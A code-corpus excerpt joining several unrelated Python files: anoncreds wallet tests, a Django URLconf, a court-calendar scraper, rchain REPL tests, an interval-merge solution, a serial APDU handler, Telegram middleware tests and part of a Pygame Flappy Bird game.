                        expect_cred_ids={'cred-0.4', 'cred-1.4'},
                        expect_policy={attr for attr in cred_values[4]})
    # SET POLICY NON-RETROACTIVELY when wallet has some credentials of interest
    # Null policy (default, all attrs)
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-2.0',
                        cred_value=cred_values[0],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=None,
                        retroactive=False,
                        query_attrs=[attr for attr in cred_values[0]],
                        expect_cred_ids={'cred-0.0', 'cred-1.0', 'cred-2.0'},
                        expect_policy=None)
    # No-attrs policy
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-2.1',
                        cred_value=cred_values[1],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=json.dumps([]),
                        retroactive=False,
                        query_attrs=['name'],
                        expect_cred_ids={'cred-0.1', 'cred-1.1'},
                        expect_policy=set())
    # One-attr policy
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-2.2',
                        cred_value=cred_values[2],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=json.dumps(['name']),
                        retroactive=False,
                        query_attrs=['name'],
                        expect_cred_ids={'cred-0.2', 'cred-1.2', 'cred-2.2'},
                        expect_policy={'name'})
    await _check_query(wallet_handle=wallet_handle,  # also ensure wallet does not tag untaggable attrs
                       cred_value=cred_values[2],
                       attr='age',
                       expect_cred_ids={'cred-0.2', 'cred-1.2'})
    # All-but-one-attr policy
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-2.3',
                        cred_value=cred_values[3],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=json.dumps(['sex', 'height', 'age']),
                        retroactive=False,
                        query_attrs=['sex', 'height', 'age'],
                        expect_cred_ids={'cred-0.3', 'cred-1.3', 'cred-2.3'},
                        expect_policy={'sex', 'height', 'age'})
    await _check_query(wallet_handle=wallet_handle,  # also ensure wallet does not tag untaggable attrs
                       cred_value=cred_values[3],
                       attr='name',
                       expect_cred_ids={'cred-0.3', 'cred-1.3'})
    # Explicit all-attrs policy
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-2.4',
                        cred_value=cred_values[4],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=json.dumps([attr for attr in cred_values[4]]),
                        retroactive=False,
                        query_attrs=[attr for attr in cred_values[4]],
                        expect_cred_ids={'cred-0.4', 'cred-1.4', 'cred-2.4'},
                        expect_policy={attr for attr in cred_values[4]})
    # RESTORE wallet state: delete credentials created in this test
    for i in range(3):
        for j in range(5):
            await anoncreds.prover_delete_credential(wallet_handle, 'cred-{}.{}'.format(i, j))
    credentials = json.loads(await anoncreds.prover_get_credentials(wallet_handle, "{}"))
    assert len(credentials) == 3
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_credential_attr_tag_policy_works_for_invalid_wallet(wallet_handle,
                                                                          prepopulated_wallet,
                                                                          issuer_1_gvt_cred_def_id):
    """Both setting and getting a tag policy must reject a bogus wallet handle."""
    bad_handle = wallet_handle + 100
    with pytest.raises(error.WalletInvalidHandle):
        await anoncreds.prover_set_credential_attr_tag_policy(bad_handle,
                                                              issuer_1_gvt_cred_def_id, None, False)
    with pytest.raises(error.WalletInvalidHandle):
        await anoncreds.prover_get_credential_attr_tag_policy(bad_handle, issuer_1_gvt_cred_def_id)
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_credential_attr_tag_policy_works_for_redundant_attr(wallet_handle,
                                                                          prepopulated_wallet,
                                                                          issuer_1_gvt_cred_def_id):
    """Duplicate attrs in the taggables list must be de-duplicated in the stored policy."""
    await anoncreds.prover_set_credential_attr_tag_policy(wallet_handle, issuer_1_gvt_cred_def_id,
                                                          json.dumps(['age', 'age']), False)
    # The stored policy should contain 'age' exactly once.
    stored = json.loads(await anoncreds.prover_get_credential_attr_tag_policy(wallet_handle, issuer_1_gvt_cred_def_id))
    assert stored == ['age']
    # Clear the policy so later tests see the default (null) policy again.
    await anoncreds.prover_set_credential_attr_tag_policy(wallet_handle, issuer_1_gvt_cred_def_id, None, False)
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_credential_attr_tag_policy_works_for_non_canonical_attr(wallet_handle,
                                                                              prepopulated_wallet,
                                                                              issuer_1_gvt_cred_def_id):
    """Attr names in a taggables list must be canonicalised: a policy set with
    'NAME' still makes the credential searchable via the canonical 'name' tag."""
    cred_value = {
        'sex': {
            'raw': 'female',
            'encoded': '135791357902'
        },
        'name': {
            'raw': 'Eveliina',
            'encoded': '321098765432'
        },
        'height': {
            'raw': '162',
            'encoded': '162'
        },
        'age': {
            'raw': str(65),
            'encoded': str(65)
        }
    }
    (cred_def_json, offer_json, cred_req, cred_req_metadata) = prepopulated_wallet[0:4]
    # One-attr policy, specified with non-canonical attr
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        # Fixed: this was an anonymisation placeholder
                        # ('<PASSWORD>'); it must match expect_cred_ids and
                        # the delete in the cleanup below.
                        cred_id='cred-eve',
                        cred_value=cred_value,
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=json.dumps(['NAME']),
                        retroactive=False,
                        query_attrs=['name'],
                        expect_cred_ids={'cred-eve'},
                        expect_policy={'name'})
    # Restore wallet state: delete credentials created in this test
    await anoncreds.prover_delete_credential(wallet_handle, 'cred-eve')
    credentials = json.loads(await anoncreds.prover_get_credentials(wallet_handle, "{}"))
    assert len(credentials) == 3
| StarcoderdataPython |
6507888 | <reponame>gabrielamelian/django-docker-code-test<gh_stars>0
from __future__ import absolute_import, unicode_literals
from django.conf import settings
from django.conf.urls import include, url
# Cache timeout (seconds), overridable via ROBOTS_CACHE_TIMEOUT in settings;
# defaults to one hour.
# NOTE(review): not referenced in this module — presumably imported
# elsewhere; confirm before removing.
CACHE_TIME = getattr(settings, 'ROBOTS_CACHE_TIMEOUT', 60*60)
# Root URLconf: everything is delegated to the questionnaire app.
urlpatterns = [
    url(r'', include("questionnaire.urls")),
]
if settings.DEBUG:
    from django.conf.urls.static import static
    from django.contrib.staticfiles.urls import staticfiles_urlpatterns
    # Serve static and media files from development server
    urlpatterns += staticfiles_urlpatterns()
    urlpatterns += static(
        settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| StarcoderdataPython |
1918557 | <reponame>cathy-ludwig/courtcase_tracker
import datetime
import pytz
import requests
from bs4 import BeautifulSoup
def update_db(conn, table_rows):
    """Parse scraped court-calendar table rows and insert them into court_cases.court_case.

    Args:
        conn: An open DB-API connection; committed once at the end.
        table_rows: Parsed ``<tr>`` elements; the first three rows are
            headers and are skipped.
    """
    cursor = conn.cursor()
    for table_row in table_rows[3:]:
        try:
            cname, date, time, hearing_type, caption, case_id = [c.get_text().strip() for c in table_row.find_all("td")]
            local = pytz.timezone("America/Chicago")
            localdatetime = datetime.datetime.strptime(f"{date}T{time}", "%m/%d/%YT%I:%M%p")
            local_dt = local.localize(localdatetime, is_dst=None)
            utc_dt = local_dt.isoformat(timespec="minutes")
            # Bug fix: the normalized ISO timestamp (utc_dt) was computed but never
            # used — the raw m/d/Y date string was inserted as court_date instead,
            # discarding the hearing time. Store the timezone-aware timestamp.
            # TODO(review): person_id is hard-coded to '1' and cname is unused.
            cursor.execute("INSERT INTO court_cases.court_case (person_id, court_date, hearing_type, case_id, caption) VALUES (%s, %s, %s, %s, %s)", ('1', utc_dt, hearing_type, case_id, caption))
        except Exception:
            # Best effort: skip rows with the wrong cell count or unparseable dates.
            continue
    conn.commit()
def get_data(date):
    """POST the court-calendar search form for *date* (m/d/Y) and return every
    ``<tr>`` element of the result page."""
    url = 'https://www.nebraska.gov/courts/calendar/index.cgi'
    form_data = {
        'court': 'C',
        'countyC': 'Douglas',
        'countyD': '',
        'selectRadio': 'date',
        'searchField': date,
        'submitButton': 'Submit'
    }
    page = requests.post(url, data=form_data)
    markup = str(page.content, "utf-8")
    parsed = BeautifulSoup(markup, features="html.parser")
    return parsed.find_all('tr')
if __name__ == '__main__':
    table_rows = get_data('12/14/2020')
    # NOTE(review): debug leftover — prints dir() of the result, not the data.
    print(dir(table_rows))
    # NOTE(review): BUG — update_db takes (conn, table_rows); calling it with a
    # single argument raises TypeError. A DB connection must be created and
    # passed here; no connection setup is visible in this file.
    update_db(table_rows)
| StarcoderdataPython |
330067 | <reponame>ArturGajowy/rchain<filename>integration-testing/test/test_repl.py
import pytest
import conftest
from rnode_testing.rnode import started_standalone_bootstrap_node
def without_banner_and_prompt(input, output):
    """Strip the REPL banner/prompt and the echoed *input* line from *output*.

    Asserts that *output* starts with the known ANSI-colored banner followed by
    the colorized echo of *input*, and returns whatever follows.
    """
    banner_and_prompt = '\x1b[31m\n ╦═╗┌─┐┬ ┬┌─┐┬┌┐┌ ╔╗╔┌─┐┌┬┐┌─┐ ╦═╗╔═╗╔═╗╦ \n ╠╦╝│ ├─┤├─┤││││ ║║║│ │ ││├┤ ╠╦╝║╣ ╠═╝║ \n ╩╚═└─┘┴ ┴┴ ┴┴┘└┘ ╝╚╝└─┘─┴┘└─┘ ╩╚═╚═╝╩ ╩═╝\n \x1b[0m\n\x1b[32mrholang $ '
    assert output.startswith(banner_and_prompt)
    # Fix: the local result used to shadow the function's own name, which made
    # the helper non-reentrant to read and confusing to debug.
    remainder = output[len(banner_and_prompt):]
    colored_input = '\x1b[0m{}\n'.format(input)
    assert remainder.startswith(colored_input)
    return remainder[len(colored_input):]
def test_repl(started_standalone_bootstrap_node):
    """Smoke-test: each Rholang term must be accepted by the node's REPL."""
    for command in (
        '5',
        'new s(`rho:io:stdout`) in { s!("foo") }',
        '@"listCh"!([1, 2, 3]) | for(@list <- @"listCh"){ match list { [a, b, c] => { new s(`rho:io:stdout`) in { s!(a) } } } }',
    ):
        started_standalone_bootstrap_node.repl(command)
def test_repl_detects_invalid_rholang(started_standalone_bootstrap_node):
    """A top-level free variable must make the REPL print the interpreter error."""
    bad_term = 'foo'
    repl_output = started_standalone_bootstrap_node.repl(bad_term, stderr=False)
    remainder = without_banner_and_prompt(bad_term, repl_output)
    assert remainder.startswith('\x1b[34mError: coop.rchain.rholang.interpreter.errors$TopLevelFreeVariablesNotAllowedError')
| StarcoderdataPython |
4846479 | # DomirScire
import operator
# Sample (first name, last name, value) records for the demo below.
# NOTE(review): the meaning of the float is not stated in this file.
PEOPLE = [('Donald', 'Trump', 7.85),
          ('Vladimir', 'Putin', 3.626),
          ('Jinping', 'Xi', 10.603)]
def format_sort_records(list_of_tuples):
    """Format (first, last, value) tuples as aligned rows, ordered by last name
    and then first name."""
    template = '{1:10} {0:10} {2:5.2f}'
    ordered = sorted(list_of_tuples, key=operator.itemgetter(1, 0))
    return [template.format(*record) for record in ordered]
if __name__ == "__main__":
    # Demo: print the sample records sorted by last name, then first name.
    print('\n'.join(format_sort_records(PEOPLE)))
| StarcoderdataPython |
9632279 | """577 · Merge K Sorted Interval Lists"""
"""
Definition of Interval.
class Interval(object):
def __init__(self, start, end):
self.start = start
self.end = end
"""
class Solution:
    """Lintcode 577: merge k sorted interval lists into one sorted,
    non-overlapping interval list via divide and conquer."""

    def mergeKSortedIntervalLists(self, intervals):
        """
        @param intervals: the given k sorted interval lists
        @return: the new sorted interval list
        """
        total = len(intervals)
        if total == 0:
            return []
        if total == 1:
            return intervals[0]
        # Recursively merge each half, then zip the two results together.
        half = total // 2
        first = self.mergeKSortedIntervalLists(intervals[:half])
        second = self.mergeKSortedIntervalLists(intervals[half:])
        merged = []
        a = b = 0
        while a < len(first) and b < len(second):
            if second[b].start <= first[a].start:
                self.pushBack(merged, second[b])
                b += 1
            else:
                self.pushBack(merged, first[a])
                a += 1
        for leftover in first[a:]:
            self.pushBack(merged, leftover)
        for leftover in second[b:]:
            self.pushBack(merged, leftover)
        return merged

    def pushBack(self, intervals_prev, interval):
        """Append *interval* to the result list, coalescing it into the last
        entry when the two overlap (mutates that entry's end in place)."""
        if intervals_prev and interval.start <= intervals_prev[-1].end:
            intervals_prev[-1].end = max(intervals_prev[-1].end, interval.end)
        else:
            intervals_prev.append(interval)
| StarcoderdataPython |
9645638 | default_app_config = 'apps.index.apps.IndexAppConfig'
| StarcoderdataPython |
6678019 | <reponame>segrids/arduino_due<gh_stars>1-10
""" MIT License
Copyright (c) 2021 by <NAME> <<EMAIL>>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Author: <NAME>
"""
from time import sleep
from . import uart
from .hexen import *
class Timeout(Exception):
    """Raised when the serial port returns fewer bytes than expected within
    its read timeout (see Apdu.sendreceive)."""
    pass
"""
apdu()
a wrapper for the Apdu class
"""
def apdu(port_or_slot, remote=False):
    """Construct an Apdu handler over a local or remote serial connection.

    Args:
        port_or_slot: Serial port name (local) or slot identifier (remote).
        remote: If True, connect through the RPC serial client instead of a
            direct local serial port.

    Returns:
        An Apdu instance wrapping the opened serial connection.
    """
    # Bug fix: this function referenced `rpcserial`, which is never imported
    # anywhere in this module (NameError at runtime); the module imports
    # `uart`, which provides the serial classes.
    if remote:
        serial = uart.SerialClient()
        serial.open(port_or_slot)
    else:
        serial = uart.Serial(port_or_slot)
    return Apdu(serial)
"""
class Apdu()
Apdu package handler
"""
class Apdu():
    """APDU packet handler: frames commands onto a serial link and parses the
    2-byte status trailer off responses. Usable as a context manager (closes
    the port on exit)."""

    def __init__(self, serial):
        # `serial` must provide open/close/read/write/read_all
        # (duck-typed; see the uart module).
        self.serial = serial

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Always release the serial port, even when the body raised.
        self.disconnect()

    def connect(self):
        """Open the underlying serial connection."""
        self.serial.open()

    def disconnect(self):
        """Close the underlying serial connection."""
        self.serial.close()

    def clear_buffer(self):
        """Drain any pending input bytes from the serial receive buffer."""
        self.serial.read_all()

    def sendreceive(self, ins, data=b'', res_len=0, cla=b'L', read_response=True):
        """Issue an APDU command.

        Args:
            ins: A single byte (bytes of length 1) specifying the command.
            data: Optional bytes to be sent as the body of the request. Request
                body left empty by default.
            res_len: Optional integer number of bytes expected as the response
                body (thus excluding the 16-bit status code).
            read_response: Optional boolean to specify whether to wait for and
                parse the response or return immediately.

        Returns:
            A tuple of the bytes of the response body and the 16-bit status
            code (body first, status second), or None if `read_response` is
            false or `res_len` is None.

        Raises:
            Timeout: If fewer than res_len + 2 bytes arrive before the serial
                read timeout.
        """
        # Frame: class byte, instruction byte, 16-bit body length, body,
        # 16-bit expected response length.
        # NOTE(review): bu16(res_len) is evaluated before the `res_len is None`
        # check below, so res_len=None likely fails here — confirm bu16(None).
        cmd = cla + ins + bu16(len(data)) + data + bu16(res_len)
        # print("sending APDU", cmd) # uncomment for debugging
        self.serial.write(cmd)
        sleep(0.001) ### added for adapter class
        if read_response and res_len is not None:
            # Response = body (res_len bytes) + 2-byte status trailer.
            res = self.serial.read(res_len + 2)
            if len(res) != res_len + 2:
                raise Timeout(
                    'Received {} bytes in {} seconds but expected {}.'.format(
                        len(res), self.serial.timeout, res_len + 2))
            return res[:-2], ub16(res[-2:])
3562991 | import logging
from django.conf import settings
from rest_framework.response import Response
from django_telegram.bot.middleware import TelegramMiddleware
# Dotted path of the Telegram sender that every test below patches.
SEND_MSG_F = 'django_telegram.bot.middleware.send_message'


def cond_fn(data):
    # Condition stub that always raises; referenced by dotted path from rule
    # configs to exercise the middleware's error handling.
    raise Exception('ERR')
def test_process_response_not_json(mocker):
    """Non-JSON (text/html) responses pass through untouched and send nothing."""
    mock_send_message = mocker.patch(
        SEND_MSG_F,
        return_value=True,
    )
    settings.TELEGRAM_BOT = {
        'CONVERSATIONS': [
            'tests.bot.conftest.ConvTest',
        ],
        'TOKEN': 'token',
        'COMMANDS_SUFFIX': 'dev',
        'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
        'MIDDLEWARE': {
            'CHAT_ID': 123,
            'RULES': [{
                'view': 'view',
                'trigger_codes': [1, 2],
                'conditions': {
                    'type': 'value',
                    'field': 'field',
                    'field_value': 'value',
                },
                'message': 'msg',
            }],
        },
    }
    response = Response(data="model", headers={'Content-Type': 'text/html'})

    # NOTE(review): the middleware calls this with the request as its sole
    # positional argument (bound to `self` here).
    def get_response(self):
        return response

    mw = TelegramMiddleware(get_response)
    assert mw(None) == response
    mock_send_message.assert_not_called()
def test_process_response_matches(django_request, mocker):
    """A rule matching view, trigger code, and field value sends the message."""
    mock_send_message = mocker.patch(
        SEND_MSG_F,
        return_value=True,
    )
    settings.TELEGRAM_BOT = {
        'CONVERSATIONS': [
            'tests.bot.conftest.ConvTest',
        ],
        'TOKEN': 'token',
        'COMMANDS_SUFFIX': 'dev',
        'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
        'MIDDLEWARE': {
            'CHAT_ID': 123,
            'RULES': [{
                'view': 'view',
                'trigger_codes': [1, 2],
                'conditions': {
                    'type': 'value',
                    'field': 'field',
                    'field_value': 'value',
                },
                'message': 'msg',
            }],
        },
    }
    response = Response(
        data={'field': 'value'},
        headers={'Content-Type': 'application/json'},
    )
    response._is_rendered = True
    response.content = '{"field":"value"}'
    response.render()
    response.status_code = 1

    def get_response(self):
        return response

    mw = TelegramMiddleware(get_response)
    assert mw(django_request) == response
    mock_send_message.assert_called_once_with(
        '[dev] view with pk pk-1 has ended with 1 and sends message: msg',
    )
def test_process_response_matches_no_conditions(django_request, mocker):
    """A rule without a 'conditions' clause matches on view + status code alone."""
    mock_send_message = mocker.patch(
        SEND_MSG_F,
        return_value=True,
    )
    settings.TELEGRAM_BOT = {
        'CONVERSATIONS': [
            'tests.bot.conftest.ConvTest',
        ],
        'TOKEN': 'token',
        'COMMANDS_SUFFIX': 'dev',
        'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
        'MIDDLEWARE': {
            'CHAT_ID': 123,
            'RULES': [{
                'view': 'view',
                'trigger_codes': [1, 2],
                'message': 'msg',
            }],
        },
    }
    response = Response(
        data={'field': 'value'},
        headers={'Content-Type': 'application/json'},
    )
    response._is_rendered = True
    response.content = '{"field":"value"}'
    response.render()
    response.status_code = 1

    def get_response(self):
        return response

    mw = TelegramMiddleware(get_response)
    assert mw(django_request) == response
    mock_send_message.assert_called_once_with(
        '[dev] view with pk pk-1 has ended with 1 and sends message: msg',
    )
def test_process_response_matches_by_func(django_request, mocker):
    """A function-type condition (resolved by dotted path) that passes sends
    the message.

    NOTE(review): the path 'tests.test_configurator.cond_fn' is expected to
    resolve to an accepting condition — confirm it differs from the raising
    cond_fn defined in this module.
    """
    mock_send_message = mocker.patch(
        SEND_MSG_F,
        return_value=True,
    )
    settings.TELEGRAM_BOT = {
        'CONVERSATIONS': [
            'tests.bot.conftest.ConvTest',
        ],
        'TOKEN': 'token',
        'COMMANDS_SUFFIX': 'dev',
        'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
        'MIDDLEWARE': {
            'CHAT_ID': 123,
            'RULES': [{
                'view': 'view',
                'conditions': {
                    'type': 'function',
                    'function': 'tests.test_configurator.cond_fn',
                },
                'trigger_codes': [1, 2],
                'message': 'msg',
            }],
        },
    }
    response = Response(
        data={'field': 'value'},
        headers={'Content-Type': 'application/json'},
    )
    response._is_rendered = True
    response.content = '{"field":"value"}'
    response.render()
    response.status_code = 1

    def get_response(self):
        return response

    mw = TelegramMiddleware(get_response)
    assert mw(django_request) == response
    mock_send_message.assert_called_once_with(
        '[dev] view with pk pk-1 has ended with 1 and sends message: msg',
    )
def test_process_response_204_no_content(django_request, mocker):
    """A 204 response never triggers a message (204 is not in trigger_codes
    and carries no content to inspect)."""
    mock_send_message = mocker.patch(
        SEND_MSG_F,
        return_value=True,
    )
    settings.TELEGRAM_BOT = {
        'CONVERSATIONS': [
            'tests.bot.conftest.ConvTest',
        ],
        'TOKEN': 'token',
        'COMMANDS_SUFFIX': 'dev',
        'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
        'MIDDLEWARE': {
            'CHAT_ID': 123,
            'RULES': [{
                'view': 'view',
                'conditions': {
                    'type': 'function',
                    'function': 'tests.test_configurator.cond_fn',
                },
                'trigger_codes': [1, 2],
                'message': 'msg',
            }],
        },
    }
    response = Response(
        data={'field': 'value'},
        headers={'Content-Type': 'application/json'},
    )
    response._is_rendered = True
    response.content = '{"field":"value"}'
    response.render()
    response.status_code = 204

    def get_response(self):
        return response

    mw = TelegramMiddleware(get_response)
    assert mw(django_request) == response
    mock_send_message.assert_not_called()
def test_process_response_matches_by_func_err(django_request, mocker):
    """A condition function that raises suppresses the notification.

    NOTE(review): 'tests.bot.test_middleware.cond_fn' presumably resolves to
    the raising cond_fn defined in this module — confirm the module path.
    """
    mock_send_message = mocker.patch(
        SEND_MSG_F,
        return_value=True,
    )
    settings.TELEGRAM_BOT = {
        'CONVERSATIONS': [
            'tests.bot.conftest.ConvTest',
        ],
        'TOKEN': 'token',
        'COMMANDS_SUFFIX': 'dev',
        'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
        'MIDDLEWARE': {
            'CHAT_ID': 123,
            'RULES': [{
                'view': 'view',
                'conditions': {
                    'type': 'function',
                    'function': 'tests.bot.test_middleware.cond_fn',
                },
                'trigger_codes': [1, 2],
                'message': 'msg',
            }],
        },
    }
    response = Response(
        data={'field': 'value'},
        headers={'Content-Type': 'application/json'},
    )
    response._is_rendered = True
    response.content = '{"field":"value"}'
    response.render()
    response.status_code = 1

    def get_response(self):
        return response

    mw = TelegramMiddleware(get_response)
    assert mw(django_request) == response
    mock_send_message.assert_not_called()
def test_process_response_not_matches_by_response_code(django_request, mocker):
    """A status code outside the rule's trigger_codes must not send anything."""
    mock_send_message = mocker.patch(
        SEND_MSG_F,
        return_value=True,
    )
    settings.TELEGRAM_BOT = {
        'CONVERSATIONS': [
            'tests.bot.conftest.ConvTest',
        ],
        'TOKEN': 'token',
        'COMMANDS_SUFFIX': 'dev',
        'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
        'MIDDLEWARE': {
            'CHAT_ID': 123,
            'RULES': [{
                'view': 'view',
                'trigger_codes': [1, 2],
                'conditions': {
                    'type': 'value',
                    'field': 'field',
                    'field_value': 'value',
                },
                'message': 'msg',
            }],
        },
    }
    response = Response(
        data={'field': 'value'},
        headers={'Content-Type': 'application/json'},
    )
    response._is_rendered = True
    response.content = '{"field":"value"}'
    response.render()
    # 5 is not in trigger_codes [1, 2].
    response.status_code = 5

    def get_response(self):
        return response

    mw = TelegramMiddleware(get_response)
    assert mw(django_request) == response
    mock_send_message.assert_not_called()
def test_get_field_value():
    """get_field_value resolves a flat (single-segment) field path."""
    settings.TELEGRAM_BOT = {
        'CONVERSATIONS': [
            'tests.bot.conftest.ConvTest',
        ],
        'TOKEN': 'token',
        'COMMANDS_SUFFIX': 'dev',
        'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
        'MIDDLEWARE': {
            'CHAT_ID': 123,
            'RULES': [{
                'view': 'view',
                'trigger_codes': [1, 2],
                'conditions': {
                    'type': 'value',
                    'field': 'field',
                    'field_value': 'value',
                },
                'message': 'msg',
            }],
        },
    }
    mw = TelegramMiddleware(None)
    model = {
        'field': 'value',
    }
    assert mw.get_field_value(model, 'field') == 'value'
def test_get_field_value_complex():
    """get_field_value resolves a dotted path through nested dicts."""
    settings.TELEGRAM_BOT = {
        'CONVERSATIONS': [
            'tests.bot.conftest.ConvTest',
        ],
        'TOKEN': 'token',
        'COMMANDS_SUFFIX': 'dev',
        'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
        'MIDDLEWARE': {
            'CHAT_ID': 123,
            'RULES': [{
                'view': 'view',
                'trigger_codes': [1, 2],
                'conditions': {
                    'type': 'value',
                    'field': 'field.field.field',
                    'field_value': 'value',
                },
                'message': 'msg',
            }],
        },
    }
    mw = TelegramMiddleware(None)
    model = {
        'field': {
            'field': {
                'field': 'value',
            },
        },
    }
    assert mw.get_field_value(model, 'field.field.field') == 'value'
def test_process_response_config_does_not_exist(django_request, mocker):
    """A rule configured for a different view name ('view-2') never fires."""
    mock_send_message = mocker.patch(
        SEND_MSG_F,
        return_value=True,
    )
    settings.TELEGRAM_BOT = {
        'CONVERSATIONS': [
            'tests.bot.conftest.ConvTest',
        ],
        'TOKEN': 'token',
        'COMMANDS_SUFFIX': 'dev',
        'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
        'MIDDLEWARE': {
            'CHAT_ID': 123,
            'RULES': [{
                'view': 'view-2',
                'conditions': {
                    'type': 'function',
                    'function': 'tests.bot.test_middleware.cond_fn',
                },
                'trigger_codes': [1, 2],
                'message': 'msg',
            }],
        },
    }
    response = Response(
        data={'field': 'value'},
        headers={'Content-Type': 'application/json'},
    )
    response._is_rendered = True
    response.content = '{"field":"value"}'
    response.render()
    response.status_code = 1

    def get_response(self):
        return response

    mw = TelegramMiddleware(get_response)
    assert mw(django_request) == response
    mock_send_message.assert_not_called()
def test_process_response_exception(django_request, mocker, caplog):
    """Errors raised while sending are caught and logged, never propagated to
    the response cycle."""
    mock_send_message = mocker.patch(
        SEND_MSG_F,
        side_effect=Exception('ERR'),
    )
    settings.TELEGRAM_BOT = {
        'CONVERSATIONS': [
            'tests.bot.conftest.ConvTest',
        ],
        'TOKEN': 'token',
        'COMMANDS_SUFFIX': 'dev',
        'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
        'MIDDLEWARE': {
            'CHAT_ID': 123,
            'RULES': [{
                'view': 'view',
                'conditions': {
                    'type': 'function',
                    'function': 'tests.test_configurator.cond_fn',
                },
                'trigger_codes': [1, 2],
                'message': 'msg',
            }],
        },
    }
    response = Response(
        data={'field': 'value'},
        headers={'Content-Type': 'application/json'},
    )
    response._is_rendered = True
    response.content = '{"field":"value"}'
    response.render()
    response.status_code = 1

    def get_response(self):
        return response

    with caplog.at_level(logging.ERROR):
        mw = TelegramMiddleware(get_response)
        assert mw(django_request) == response
    mock_send_message.assert_called_once()
    expected_config = settings.TELEGRAM_BOT['MIDDLEWARE']['RULES'][0]
    assert (
        f'TelegramMiddleware rule {expected_config} finished with error: ERR'
    ) in caplog.records[0].message
| StarcoderdataPython |
5081634 | import pygame, sys, random
def draw_floor():
    """Blit two copies of the floor at y=900, one screen-width (576 px) apart,
    so the scrolling floor wraps seamlessly."""
    screen.blit(floor_surface, (floor_x_pos,900))
    screen.blit(floor_surface, (floor_x_pos + 576,900))
def create_pipe():
    """Return a (bottom, top) pair of pipe rects spawned at x=700 with a
    randomly placed 250 px vertical gap."""
    random_pipe_pos = random.randint(350,800)
    bottom_pipe = pipe_surface.get_rect(midtop = (700,random_pipe_pos))
    top_pipe = pipe_surface.get_rect(midbottom = (700,random_pipe_pos-250))
    return bottom_pipe, top_pipe
def move_pipes(pipes):
    """Scroll every pipe 2 px left and return only those still near the screen
    (right edge past -50 px)."""
    on_screen = []
    for rect in pipes:
        rect.centerx -= 2
        if rect.right > -50:
            on_screen.append(rect)
    return on_screen
def draw_pipes(pipes):
    """Draw the pipe list, flipping every second rect vertically — pipes are
    stored as alternating (bottom, top) pairs from create_pipe()."""
    bottom = True
    for pipe in pipes:
        if bottom:
            screen.blit(pipe_surface, pipe)
        else:
            flip_pipe = pygame.transform.flip(pipe_surface, False, True)
            screen.blit(flip_pipe, pipe)
        bottom = not bottom
def check_collision(pipes):
    """Return False (game over) if the bird hits any pipe or leaves the play
    area (above y=-100 or below the floor at y=900); play the crash sounds on
    a hit. Returns True while the game may continue."""
    for pipe in pipes:
        if bird_rect.colliderect(pipe):
            hit_sound.play()
            death_sound.play()
            return False
    if bird_rect.top <= -100 or bird_rect.bottom >= 900:
        hit_sound.play()
        death_sound.play()
        return False
    return True
def rotate_bird(bird):
    """Return the bird surface tilted by -3x its vertical speed (nose up when
    rising, down when falling)."""
    new_bird = pygame.transform.rotozoom(bird, -bird_movement*3, 1)
    return new_bird
def bird_animation():
    """Return the current flap frame and a rect re-centered at x=100 while
    keeping the bird's present vertical position."""
    new_bird = bird_frames[bird_index]
    new_bird_rect = new_bird.get_rect(center = (100,bird_rect.centery))
    return new_bird, new_bird_rect
def score_display():
    """Render the score: just the number while playing; 'Score'/'High score'
